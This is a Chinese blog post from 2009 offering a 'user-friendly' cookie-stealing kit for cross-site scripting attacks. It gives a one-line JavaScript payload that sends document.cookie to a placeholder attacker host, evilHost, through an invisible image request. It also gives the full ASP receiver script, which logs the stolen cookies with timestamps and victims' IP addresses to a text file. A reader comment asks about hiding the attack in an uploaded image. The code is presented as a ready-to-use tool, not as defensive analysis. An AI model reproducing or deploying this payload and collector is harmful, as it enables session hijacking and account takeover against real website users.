首页 > 技术文章 > 比较人性化的盗Cookies脚本

比较人性化的盗Cookies脚本

2009年10月20日 发表评论 141 views 阅读评论

cookie窃取是最常见的跨站攻击之一,不管是用img,iframe方式,还是基于入库型或非入库的XSS,整个操作只需要带Cookie浏览器请求了某个的url即可完成。

本人偏爱Image:

img = new Image(); img.src = "http://evilHost/get.asp?cookie=" document.cookie;img.width=0;img.height=0

盗cookie脚本:

还是一个比较简单的程序,经过一点完善,在获取Cookie同时也记录的时间和IP,比较智能化与人性化,务求达到一个更好的用户体验,呵呵!

get.asp
code:

< %

dim getcookie

dim mytime

dim str

getcookie=Request.QueryString

getip=Request.ServerVariables("REMOTE_ADDR")

mytime=now()

set fs=server.CreateObject("Scripting.FileSystemObject")

set file=fs.OpenTextFile(server.MapPath("cookie.txt"),8,True)

str="<-bof||"& mytime & "||" &getip & "||" & getcookie & "||eof->"

file.writeline(str)

file.close

set file=nothing

set fs=nothing

response.write "haha"

response.end

%>

随机日志

分类: 技术文章 标签:
  1. 记忆
    2009年10月23日05:42 | #1
    回复 | 引用

    回返,呵呵。有空记得去我那踩踩哦?

  2. X1ao.Zhe
    2009年10月30日13:18 | #2
    回复 | 引用

    不错,不知道 上传一个jpg,JPG 使用html写内容偷取COOIES 会不会成功。

  1. 本文目前尚无任何 trackbacks 和 pingbacks.